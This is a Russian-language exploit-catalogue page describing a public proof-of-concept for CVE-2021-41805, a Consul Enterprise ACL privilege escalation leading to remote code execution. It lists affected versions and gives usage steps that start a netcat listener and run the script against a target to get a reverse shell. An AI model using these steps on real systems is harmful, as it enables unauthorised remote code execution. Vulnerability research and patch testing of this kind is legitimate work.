Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41805 — Эксплойт-концепт для CVE-2021-41805 — уязвимости в HashiCorp Consul Enterprise, допускающей удалённое выполнение кода (RCE) с расширенными привилегиями. | Kitploit
Инструменты/GitHubGitHub/acfirthh/cve-2021-41805
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеБезопасность облачных средОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubacfirthh/cve-2021-41805

CVE-2021-41805

Эксплойт-концепт для CVE-2021-41805 — уязвимости в HashiCorp Consul Enterprise, допускающей удалённое выполнение кода (RCE) с расширенными привилегиями.

Репозиторий
1 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41805 - HashiCorp Consul Enterprise RCE

[!WARNING] ПРАВОВОЙ ОТКАЗ ОТ ОТВЕТСТВЕННОСТИ: Этот инструмент предназначен СТРОГО ТОЛЬКО для ОБРАЗОВАТЕЛЬНЫХ ЦЕЛЕЙ! Использование этого инструмента для атак на цели без предварительного обоюдного согласия ЯВЛЯЕТСЯ НЕЗАКОННЫМ. Ответственность за соблюдение всех применимых законов при использовании этого инструмента лежит на пользователе. Разработчик этого инструмента не несёт ответственности и не отвечает за любое неправомерное использование или ущерб, причинённый данной программой.

О CVE

ACL-токен (с правами по умолчанию operator:write) в одном пространстве имён (namespace) может быть использован для непреднамеренного повышения привилегий в другом пространстве имён. Этим можно злоупотребить для получения удалённого выполнения кода (RCE) с повышенными привилегиями.

Затронутые версии

  • < 1.8.17
  • 1.9.x < 1.9.11
  • 1.10.x < 1.10.4

Установка и запуск скрипта

  • Сначала клонируйте репозиторий:
    git clone https://github.com/acfirthh/CVE-2021-41805.git
  • Перейдите в каталог клонированного репозитория:
    cd CVE-2021-41805
  • Запустите простой слушатель:
    nc -nvlp <LISTENER_PORT>
  • Запустите скрипт:
    python3 CVE-2021-41805.py -r <TARGET_IP> -rp <TARGET_PORT> -l <LISTENER_IP> -lp <LISTENER_PORT> [OPTIONAL: -t <ACL token> -v (verbose) -s (use SSL)]

Обратная оболочка

Ожидаемый вывод

При запуске эксплойта с базовыми аргументами: -r [TARGET_IP], -rp [TARGET_PORT], -l [LISTENER_IP], -lp [LISTENER_PORT] (-t [ACL_TOKEN], -s [Use SSL]) вывод будет выглядеть примерно так:

root@kitploit:~
[*] The PUT request was made successfully. Check your listener...

При запуске эксплойта с базовыми аргументами и флагом -v [VERBOSE] вывод будет подробным:
Подробный вывод

Если при запуске эксплойта произойдёт ошибка и будет указан аргумент -v, вывод будет выглядеть примерно так:
Подробный вывод с ошибкой

Скачать инструмент